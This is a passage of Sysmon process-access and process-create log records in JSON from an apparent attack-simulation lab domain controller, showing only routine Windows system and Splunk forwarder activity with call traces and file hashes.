C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3865,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3866,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3867,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3868,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FFF-5F25-0000-0010F9D40500}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FFF-5F25-0000-0010F9D40500}","TargetProcessId":"4436","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3869,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.099\r\nSourceProcessGUID: {41C8662E-1FFF-5F25-0000-0010F9D40500}\r\nSourceProcessId: 4436\r\nSourceThreadId: 4736\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.099","SourceProcessGUID":"{41C8662E-1FFF-5F25-0000-0010F9D40500}","SourceProcessId":"4436","SourceThreadId":"4736","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3870,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.631\r\nProcessGuid: {41C8662E-2000-5F25-0000-0010A3D60500}\r\nProcessId: 1524\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.631","ProcessGuid":"{41C8662E-2000-5F25-0000-0010A3D60500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3871,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010375D0500}\r\nTargetProcessId: 1524\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010375D0500}","TargetProcessId":"1524","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3872,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010375D0500}\r\nTargetProcessId: 1524\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:44.630","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010375D0500}","TargetProcessId":"1524","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3873,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:44.630\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: 